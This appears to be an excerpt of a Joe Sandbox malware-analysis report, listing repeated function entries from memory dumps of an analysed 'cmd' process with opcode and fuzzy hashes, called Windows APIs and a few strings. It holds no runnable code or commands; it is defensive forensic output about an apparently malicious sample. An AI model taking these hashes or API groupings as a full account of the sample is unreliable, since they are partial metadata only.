                                            • Instruction ID: eca4a3df3ca8ad9657c852040a6c8279c8f014eff4ee3fc7f6487c8c2406ca7b
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 0C021A32A5CB8886E761CB45F89435ABBA0F3C47D5F501025EA8E83BA8DF7CC564DB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 6246c967c5f44e34a9c8cfc0b8e02a991e2bdf68ab1d5470ebfb8935749c002b
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 1251C335BC8E0987E376CB16EC48A5A77A0F784BC2F5050199D5A43FA4DF38CA55CB48
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: d2fc286aff532b64363d35af44c1c15a241f2722c207909420604d188fdf0bd0
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 5D51E335A48E0487E777CB16AC08A5A73A0F7C8BC2F9050299E1A43F95CF38CA15DB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: e6ba1e2a830b874512fbc45de79ff54c18a8cffe3e5c7f8362b7e6c3047fc7ea
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: FE51B335BD8A0A87E736DF16AC4865A7BB0F384BC1F401118DD5A43FA4DB38CA55CB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: a067a5e322b4bd81c05b3f4d1e423c6038de3b4de8b9b46c89b57c050558addf
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 1D51E635A58E0A87E736CF16AC4865A77A0F3C8BC2F901028DE5A43F55DF39CA15DB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: ff2e5cb798059ff36db51ac6ada8bb3a66f1072125d7116f338f12ca9dd863ba
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 3961DB329EDA4886E761CB15E85835ABBE0F388785F102115FA8D43FA8DB7DC650CB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 510aa9228cd74a7c7699de3070206a9fcfe3036056f7ed416eb300a20ffa0654
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 3161DA3696CB4886E761CB55E84831AB7E0F3C8785F502525EA8D43FA8DB7CC660DB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 5d2ebbe726096747bc43f3feda664cb961532e0ffcd728e071bfa11921dbdbae
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 99113336E89B4497EB26CB61E8087596B70F784BC1F041126DE9D03B64EB7DC664C788
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 316a2c1a2f31f5b1a2d1d34bfb432eaddd61736101ac6fb213dcaa7f146468f4
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 09116036E08B4483EB25CB21E80874A67B0FB85BC2F540026DE5D03B94EB7DCA65C788
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 37981bb996aded8a7590e53062efd924c93ded5781a060bdaa07e9cf74c929f8
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 00514A32BD9E088ADB16CF15E90CB6C3791F754BD9F005120DE4A87BA8DB78CA65C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 75c335eb18cb9709385421223b7e7f25559b7d907d4c40222ab12ffac17d1330
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 69513832B49E088ADB16CF15D80CB6CB391F394BD9F905132DE4A87B88D77ACA65D704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 1f646d717a283c9b5ecb16e2a7c41d1d221c04b347df6d7c3c3950cc47db39cd
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: DC51B0339C8A888BEB76CF1199483587BA0F354BC6F156116DB8947FE5CB38C660C719
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: b802094a36a5b58dd2dddcc4e49558627023f015f019adc247a681c435bd2d16
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3D61B073988FC881DB22CF15E84479AB7A0F794BD9F045615EBD817BA5DB38C2A4CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: bb40833eb9cf79e32db870993989b7de30a8f7030f7fc0ee9fd5dbd7ed0986a1
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: B051D0329C8A4887EB36CF5198483587BA0F3D4BC6F946125DB8947FD1CB38C660E719
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: f3bdf7457294e6e687a2d3dacf688528f7c08d3fccf31e2d1341117e8f55bb85
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: C861CF72948BC881EB22CF55E84439AB7A0F7D5BD9F445625EB8813B95CB38C2A4CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 2e10d0cf325600c3561fdb30cf56c158ff606b1ab13ad2282e8309f454e49b47
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 8751D032988B4C8AEB30CFA19A5839877A4E354BCAF146117DA8947F85CB3CC650C74A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 22bc3db451bfb27a3656172b0af6eb515a5d24810a68155a3536fb412eabe5d4
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 6411BB31BD8F8951E712D725EC0D35A57A4F7847C1F901425AE4983EA4EF34CA25CB08
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: e9446edf6ae0ca99f98a489eea980a91d20f21cf0efe9611d6756f54dad83905
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 3011B731B58F8991EB12DB25EC0839A52A4F7C47C2FD410319E4D83E94EF38CA26D708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: b92cb9f217b573c9d97c2526068f27ed21771c7872bcf10f2edf8cfe25104d7a
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 94D1D132B58A9889E722CFA6D8443DC37B1F3547D9F405216CE9DA7F99DA34C226C344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: eefb187e49197ae5781286d23f233bb9e1022043521d7903fef02fadc3570a2f
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 40D10232B18E4889E722CFA5D8486EC37B1F354BDAF505216CE5DA7F99DA34C226C304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: df0d786843b48ec81609c93ab77edd5a81fb52fd8a6683c4f7cc0788b813ae56
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: F7015732E94E84DAE716DF67AC0828977A0F788FD1B095025DF9A43B28DE34D161C744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 99f2fb384c74aa6eabeccf8d80b6544d2a2d04ab8d43210a8110a8ac63cc5ad8
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 42015732E54E84DAEB15DF66AC0858977A0F788FC1B195025DF5A43B28DE34D161CB44
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000253FC4128DF), ref: 00000253FC412A12
